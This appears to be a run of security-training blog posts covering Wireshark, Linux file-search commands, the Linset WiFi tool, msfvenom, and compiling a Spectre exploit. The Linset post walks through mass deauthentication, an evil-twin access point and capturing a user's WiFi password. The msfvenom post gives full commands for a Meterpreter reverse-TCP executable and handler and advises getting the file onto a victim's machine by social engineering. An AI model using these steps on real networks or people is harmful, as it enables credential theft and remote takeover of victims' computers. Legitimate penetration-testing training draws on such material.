What is Wireshark?

  What is Wireshark?

Wireshark is the most common network protocol analyzer. In addition to being a free and an open source packet following the terms of the GNU General Public License(GPL), we mainly use it when it comes to network troubleshooting, analysis, software and communications protocol development, and education. It shows its user what is happening on their network at a microscopic level. A majority of commercial and non-profit organizations, government agencies, and educational institutions use Wireshark.

History:

In 1998 Gerald Combs, a computer science graduate of the University of Missouri-Kansas City, started a project and named it Ethereal. It was the basic foundation of Wireshark. having this name since 2006 when Combs started to work with CACE Technologies while holding the copyright of most of the project’s code. The rest of the code was opened for any modification under the GPL Terms. Then, volunteer contributions of network experts around the universe added to the project, making it as famous and widely used as it is nowadays.

Because Combs did not own the Ethereal trademark he decided to change its name into Wireshark. It was not until 2010 when Riverbed Technology purchased CACE Technologies to become the main sponsor of Wireshark. There are several contributors –around 600 authors– to this product; still, Combs is the essential responsible for maintaining the overall code and executing new version releases of Wireshark.

Wireshark won several awards for its vital role in today’s network security. It got an award for the Most Important Open-Source App of All-Time by eWeek. Moreover, it won the Editor’s Choice award from PC Magazine. In addition, Insecure.Org network security tools survey ranked as a top packet sniffer.

The functionality of Wireshark:

Similar to tcpdump, a common packet analyzer, Wireshark allows us to analyze network packets but with the aid of a graphical front-end and some extra integrated sorting and filtering options. A Network Interface Controller(NIC) is put into this mode if it does support promiscuous mode. This is usually in order to visualize all the traffic on the interface not merely the interface’s configured addresses and broadcast/multitask traffic.

However, to get the entire network traffic, other techniques such as port mirroring and network taps are utilized. This is done along with using the promiscuous mode on a port. This is attributed to the fact that a port does not necessarily get all the network traffic.

Wireshark 1.4 and later has the ability to put wireless network interface controllers into monitor mode. If some packets are captured by a remote machine and sent to Wireshark, protocols of type TZSP or OmniPeek’s protocol – where OmniPeek is another packet analyzer- are analyzed at the time they were captured on their remote machines.

What features does Wireshark include?

In fact, Wireshark offers a large set of features. In the following points, I will attempt to summarize the features that

Wireshark offers:

  • Wireshark is a network analyzer that inspects Hundreds of protocols.
  • It allows both offline analysis and live captures.
  • It could run on diverse operating systems such as Microsoft Windows, Linux, macOS, Sun Solaris, and several other platforms.
  • A graphical user interface (GUI) is supported using QT widget toolkit, which enables us to browse captured network data, or in the non-GUI version, TTY-mode TShark utility could be utilized for the same purpose as well.
  • It offers sufficient Voice over Internet Protocol(VoIP) analysis. We can even play the media flow when decoding such captured traffic.
  • Wireshark uses pcap to capture packets.
  • It generates Capture files in gzip format, which is easily decompressed.
  • Such captured files could be programmatically edited or altered to the “editcap” programming with the help of some command-line switches.
  • It allows the traffic capturing of Raw Universal Serial Bus(USB).
  • Wireshark is able to capture packets from ns OPNET Modeler, NetSim, and some other network simulation tools.
  • It supports Read/Write of many capture file formats such as tcpdump (libpcap) which is the native network trace file format, Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer, Sniffer Pro, NetXray, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix k12xx, Visual Networks Visual UpTime, WildPacketsEtherPeek/TokenPeek/AiroPeek and several other formats.
  • It reads Live Data through different means such as Ethernet IEEE 802.11, PPP/HDLC, ATM, loopback, Bluetooth, FDDI, and many others.
  • The decryption is supported for many protocols including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2.
  • Application of Coloring rules to the packet list allows for quick and easy analysis. See section Color Coding for further details.
  • One can ensure that only the triggered traffic becomes analyzed by applying particular filters, timers, and other settings.
  • XML, PostScript, CSV or plain text are all the types that output is exported and formatted.

Security Policies:

In general, there is no need for certain security privileges to allow us to utilize neither Wireshark or TShark. Nowadays, only requires to have tcpdump or dumpcap, given special privileges, and run on a machine to capture traffic with no need for any further privileges for the user.

But how can a superuser grant the aforementioned required privileges to a user? The answer basically lies in the fact that tcpdump or dumpcap which come with Wireshark should have special privileges for them to capture packets into a file. This file would require the opening of Wireshark for analysis with seriously restricted privileges. Even wireless networks could harness Aircrack wireless security tools and capture IEEE 802.11 frames to further read the resulting tcpdump dumpcap files with running Wireshark afterward.

Why do we need to restrict the users from privileges to freely run Wireshark and use its tools? This is basically because capturing traffic calls an enormous number of protocol dissectors, which could most probably arise a network security risk. Since there is a potential of finding a bug in one of these dissectors and thereby exploiting it, this puts the entire security system at a great risk. That is why running Ethereal/Wireshark in the past required superuser privileges for one to be responsible for what can potentially be affected.

Filtering Packets:

Sometimes we need to capture specific traffic packets such as traffic which a program sends when phoning home. While a large number of captured packets in a network, one has to close down all other applications using the network in order to get some specific traffic type. At this point emerges the importance of Wireshark’s filters. At the top of the window, there is a filter box at which we can simply type a certain filter name in order to apply this filter and then we should click Apply, or press Enter alternatively. For instance, to see only DNS packets, we type “DNS” in the filter box. Wireshark helps auto-complete a filter name while writing its name in the filter box.

Color Coding:

The colors Green, Blue, and Black distinguish the type of captured packets. Conventionally, green color indicates Transmission Control Protocol (TCP) traffic. Dark blue, on the other hand, is Name System (DNS) traffic, whereas light blue demonstrates User Datagram Protocol (UDP) traffic. Black shows TCP packets with problems such as being out-of-order.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

References:

https://en.wikipedia.org/wiki/Wireshark

https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/amp/

https://www.wireshark.org/

https://wiki.wireshark.org/

http://sectools.org/

https://www.quora.com/unanswered/What-security-policies-can-you-check-using-Wireshark

Elsewhere, check out my other post about Metaspoilt.

How to find stuff in Linux

You’ll often find yourself looking for things. Here are some useful tips for just that. There are some commands that have proven useful for finding things in Linux.

find is a popular command line tool that searches for files in the directory hierarchy. The command searches the current directory and recursively searches subdirectories for the supplied criteria.

The -name argument allows you to find specific patterns of information. Of note, find is case sensitive so use -iname to avoid missing what you are looking for.

find . -name file

locate is a very fast way of searching for files on disk rather than searching for file paths on the system. By default, locate does not check if files still exist in the respective database. To update the database that locate searches is updated with the updatedb command. Locate a file on the Strategic Security Ubuntu VM. Using locate without any options will bring up results that contain the keyword.

Let’s locate the file r00kies. This file will need to be created for this example using the touch command. Use the touch command to create 3 different files with r00kies in the name. Make sure to update the database after these files are created using sudo updatedb.

This shows us 3 files, but we only wanted the r00kies files. Let’s use the -b option to search exactly what we want. The backslash disables the implicit replacement of “r00kies” by “*mydata*” so you end up with only what we are looking for.

locate -b ‘\r00kies’

whereis searches for binary files, source files, and man pages. This is useful when determining a file is executed from. To only show the executable only, use the -b option.

whereis firefox
whereis -b firefox

which command helps in returning the absolute path of the executable that is called. This makes creating shortcuts a bit easier. By default which only shows the first matching executable. To display all results use the -a option. Only the current user’s PATH variable are searched.

which firefox

Reference(s):

http://www.thegeekstuff.com/2009/03/15-practical-linux-find-command-examples/

http://www.howtogeek.com/112674/how-to-find-files-and-folders-in-linux-using-the-command-line/

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Linset

Linset is a tool of Spanish origin for that reason we have some screenshot are in Spanish.

If you are one of the people who like to test the security of wireless networks, Wifislax is the Linux distribution that will help you a lot. In this blog, we will show you one of the tools that are integrated.

The first thing we have to do is to download Wifislax.

Download links:

LINK1 FTP OFICIAL: http://www.downloadwireless.net/isos/wifislax64-1.0-final.iso

LINK2 MEDIAFIRE: http://www.mediafire.com/file/25rsmyz449g2csc/wifislax64-1.0-final.iso

LINK3 MEGA:  https://mega.nz/#!jsglSLxb!bZgdN7yeWvL2-xzPv7-15FOHf8FHnH6lWvCNogy2hTQ

DRIVER NVIDIA: http://www.mediafire.com/file/zoaebscconl6xrv/Driver_NVIDIA-367.57_wifislax64-x86_64-8sw.xzm

DRIVER AMD: http://www.mediafire.com/file/l422ezur7z2b61o/Driver_AMD-15.12_wifislax64-x86_64-8sw.xzm

After the download, you can install them as a virtual machine or in a pen driver, At the moment of initiating Wifislax we will have the following option, we select Run whit smtp kernel, and we give it to enter

Select wifislax with KDE Desktop and enter.

Let’s hope that Wifislax does not show its desktop environment

If you have wifislax installed as a virtual machine must connect a wifi antenna can be USB and you have to configure VirtualBox or VmWare to recognize your Wifi Usb card.

Now we click on linset as shown in the following image.

At this moment we have our tool ready to use.

The first thing that asks us is what adapter do we want to use? But in this case, we only have one option, so we press the 1 key and enter.

Then it tells us if we want all the channels or a specific channel. Take option one to analyze all the channels.

As you can see we are already scanning the WiFi networks that our antenna can capture.

For this case we will take the network called INFOSECADDICTS.

We close the scanning window to get the other options

we choose option 1

We select option 1 to perform a massive de-authentication of the AP

we have captured the handshake

we choose option 1 which corresponds to a neutral interface.

we select the English language

Now we just have to wait for the user to connect so that linset will ask for the password.

below we have the screenshot of the experience of a normal user connected to the network.

We have cloned the AP automatically as shown in the following image.

As soon as a user connects, we can see which sites he is consulting.

Now you are forcing him to write the password again.

Bingo, we have captured the password. we can already use metasploit for or any other tools to compromise the connected devices in the network.

Resources:

https://www.wifislax.com/

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

How to use msfvenom

Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.

Entering from the ubuntu terminal with root user.

The new tool msfvenom incorporates a help in the terminal itself so that we know the “flags” that we can use, to enter this help it is enough to type:

To see what payloads are available from Framework, you can do:

msf5> msfvenom -l payloads

or

# msfvenom -l payloads

How to generate a payload

This command uses msfvenom to create a malicious executable file that will open a Meterpreter session using a reverse TCP payload. The listening host is your own computer.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.14 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe

We have created our malicious file called infosecaddicts.

This handler will listen for the payload and attempt to open a Meterpreter session onto the victim’s
computer.

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.14
msf> set LPORT 4444
msf> run

After creating our malicious file we just have to get it to the victim machine and execute it, you can use social engineering or any other method.

As a result, you will have the meterpreter session.

In the same way that we did it for windows we can do it for any other operating system for examples: Android, iOS, Liniux etc …

Resources:

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Compiling code in Linux

Cybersecurity tools are not always ready to be used or run in operating systems, many times we will not find applications in their source code or binary, so know the ways to compile code in Linux is an essential convention on the way to becoming in a security expert.

A compiler allows us to translates the high-level code into low-level or machine code.  There are many ways to compile code in Linux If you want to compile C code is necessary to have installed in your system a gcc compiler, which is responsible for translating the high-level code into binary code understandable by the machine. In the same way, programming languages such as Ruby, Python, and others use their own compiler to be able to be executed in the system.

Binary and Source Code

Before running a program in Unix-like systems, first, we should compile and then execute. A program could be available in a binary format or source code.

A binary is a package that has already been pre-compiled, in general, a binary match with the OS’s platform, which means that the application has been adjusted to a specific architecture, for example, we can find binary .deb for 64AMD or .rmp for i386. We need to put this binary into our filesystem and run a packages manager like apt or yum. In theory, it could already be executed for its use but if the dependencies or libraries are not installed in the system, the program will not work. That is why we must be sure that in the system there is everything necessary so that the application can be executed.

Is important to understand that not always we will find a package for a given system, so the option is to compile the source code since it is not adjusted to any architecture or system. The source code, we could say that it’s the RAW code with a defined format so it can be compiled. In general, the source code is packaging into a .tar, .zip archive compress.

Ways to compile source code in Linux:

In Linux we can compile code in different ways, using the language of the compiler itself or by using operating system tools.

Using a Language compiler

For our LAB we will use ubuntu-infosecaddicts VM and the exploit that we find in https://github.com/Eugnis/spectre-attack/archive/master.zip, this exploit is done in C language and we will use GNU gcc compiler. This exploit allows us to attack processors breaking the isolation and extracting data from a memory.

Most  Unix-like systems are integrated with the gcc compiler. GCC is an integrated compiler of the GNU project for C, C ++, Objective C and Fortran; is able to receive a source program in any of these languages and generate a binary executable program in the language of the machine where it has to run. The acronym GCC means “GNU Compiler Collection”. Originally it meant “GNU C Compiler”; GCC is still used to designate a compilation in C. G ++ refers to a compilation in C ++.

First, we can check if gcc is installed:

run

gcc –version

The syntax

gcc <sourcecode.c> [options] <output>

Now,

1. Download 
wget https://github.com/Eugnis/spectre-attack/archive/master.zip.
2. unzip master.zip
3. Enter to the directory uncompress 
cd spectre-attack-master
4. Compile 
gcc Source.c -o spectre.out 
(if we open spectre.out with any text edit we will see that it is not human readable).
5. execute 
./spectre.out`

If the processor is vulnerable we will see the message “The Magic Words are Squeamish Ossifrage” in memory.

In this case, gcc creates the binary spectre.out which is the executable program itself.

Using the operating system tools

 

Unix-like systems have several tools that help when compiling code manually, one of them is the very well know GNU make. 

The make utility automatically determines which pieces of a large program need to be recompiled, and issues commands to recompile them.

A project needs to meet some criteria so that it can be compiled with the make tool. Each project needs a Makefile. A Makefile is a script that describes the project structure, namely, the source code files, the dependencies between them, compiler arguments, and how to produce the target output.

Examining our master.zip file, we see the file makefile, next, we compile our source code:

  1. Into the directory cd spectre-attack-master
  2. Run make makefile

This action will create the binary spectre.out similar to the previous process using gcc as a compiler.